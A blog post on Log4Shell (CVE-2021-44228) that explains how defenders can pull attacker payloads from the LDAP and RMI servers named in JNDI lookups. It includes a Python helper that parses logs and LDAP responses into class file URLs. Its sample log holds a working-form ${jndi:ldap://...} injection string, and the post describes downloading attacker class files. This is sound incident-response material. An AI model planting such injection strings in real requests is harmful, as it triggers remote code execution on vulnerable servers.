Wednesday, December 15, 2021

CVE-2021-44228 - Retrieving Payload

CVE-2021-44228 tracks a remote code execution vulnerability in Apache Log4j. An attacker who can control the content of a logged message can make the application perform a JNDI lookup against an attacker-controlled endpoint (LDAP, RMI, DNS, HTTP, etc.) and execute arbitrary code loaded from it.

LDAP Payloads

A typical LDAP attack request can look like this:

To retrieve the payload, defenders can use curl, which speaks LDAP when built with LDAP support, so the ldap:// URL from the lookup string can be handed to it directly. The payload can be downloaded like this:


The response from the attacker's LDAP server tells us where the javaCodebase points: an HTTP server hosting a malicious class file whose code runs the attacker's commands. Let's follow the class file. Its URL is formed by combining javaCodebase and javaFactory (the JDK loads <codebase><factory>.class), which here becomes http://<attacker_server>:8082/Exploit.class

The downloaded class file reveals the attacker's intentions clearly.


You can now retrieve any further payloads referenced in the Java class above.
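The LDAP retrieval above, as an added example that is not the post's own code: it pulls the JNDI lookup out of a log line, prints the curl command a defender would run, parses the "DN: / attr: value" listing the LDAP server returns, and combines javaCodebase and javaFactory into the class file URL, checking that whatever is downloaded really is a Java class. The log line, the 203.0.113.10 addresses, the base DN and the response layout are constructed for illustration; only the plain ${jndi:...} form is matched, not the obfuscated variants.

```python
#!/usr/bin/env python3
"""Added example (not the post's code): from a logged JNDI lookup to the URL
of the class file the attacker's LDAP server points at.

Assumptions (not from the post): the sample log line, the 203.0.113.10
host, the base DN and the 'DN: / attr: value' response layout below are
constructed for illustration."""
import re
import shlex
from urllib.parse import urlparse

# Plain-form lookup only; nested/obfuscated forms such as ${${lower:j}ndi:...}
# are deliberately out of scope for this example.
JNDI_RE = re.compile(r"\$\{jndi:(?P<url>(?:ldaps?|rmi|dns|https?)://[^}\s]+)\}",
                     re.IGNORECASE)

def extract_jndi_urls(log_text):
    """Return every JNDI URL found in the given log text."""
    return [m.group("url") for m in JNDI_RE.finditer(log_text)]

def lookup_target(url):
    """(scheme, host, port, path) of a JNDI URL; the path is what the
    attacker's server sees as the search base / bound name."""
    p = urlparse(url)
    return (p.scheme.lower(), p.hostname, p.port, p.path)

def curl_command(url):
    """curl treats the path of an ldap:// URL as the search base DN and
    prints the entries it gets back. Quoting keeps attacker-supplied
    characters from being interpreted by the shell."""
    return "curl -s --max-time 10 " + shlex.quote(url)

def parse_ldap_response(text):
    """Parse the 'DN: ...' / 'attr: value' listing curl prints for an LDAP URL
    (ldapsearch LDIF output parses the same way). Attribute names are
    lowercased so javaCodebase / javaCodeBase both resolve."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line[:3].upper() == "DN:":
            current = {"dn": line[3:].strip(), "attrs": {}}
            entries.append(current)
            continue
        if current is None or ":" not in line:
            continue
        attr, _, value = line.partition(":")
        current["attrs"].setdefault(attr.strip().lower(), []).append(value.strip())
    return entries

def class_file_url(entry):
    """javaCodebase + javaFactory -> URL of the factory class the JDK would
    load. A dotted factory name maps to a directory path as a URLClassLoader
    would resolve it. Returns None when no codebase is advertised (the server
    may be relying on javaSerializedData instead)."""
    attrs = entry["attrs"]
    codebase = attrs.get("javacodebase", [None])[0]
    factory = attrs.get("javafactory", [None])[0]
    if not codebase or not factory:
        return None
    if not codebase.endswith("/"):
        codebase += "/"
    return codebase + factory.replace(".", "/") + ".class"

def is_class_file(data):
    """Every Java class file starts with the magic 0xCAFEBABE."""
    return data[:4] == b"\xca\xfe\xba\xbe"

def fetch(url, timeout=10):
    """Download the class file (network; not exercised offline)."""
    import urllib.request
    with urllib.request.urlopen(url, timeout=timeout) as r:
        return r.read()

# Constructed sample input (illustration only)
SAMPLE_LOG = 'GET / HTTP/1.1 "User-Agent: ${jndi:ldap://203.0.113.10:1389/a}"'
SAMPLE_RESPONSE = """DN: a
\tjavaClassName: Exploit
\tjavaCodebase: http://203.0.113.10:8082/
\tjavaFactory: Exploit
"""

if __name__ == "__main__":
    for url in extract_jndi_urls(SAMPLE_LOG):
        print("lookup:", lookup_target(url))
        print("run   :", curl_command(url))
    for entry in parse_ldap_response(SAMPLE_RESPONSE):
        print("class :", class_file_url(entry))
```

Once the class file is on disk, is_class_file() is a cheap sanity check before handing it to a decompiler; an HTML error page or a second-stage dropper served from the same path will fail it.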

RMI Payloads

A typical RMI attack request can look like this:


To download the payload from the RMI server we can use Python. I've written a simple Python script that retrieves the RMI payload from the attacker's server.


The script can be executed like this: python rmi_client.py <attacker_ip> <port> <rmi_endpoint>. Once executed, the RMI server should spill out the payload, like below.


You can now retrieve any further payloads referenced in the response from the attacker-controlled RMI server.
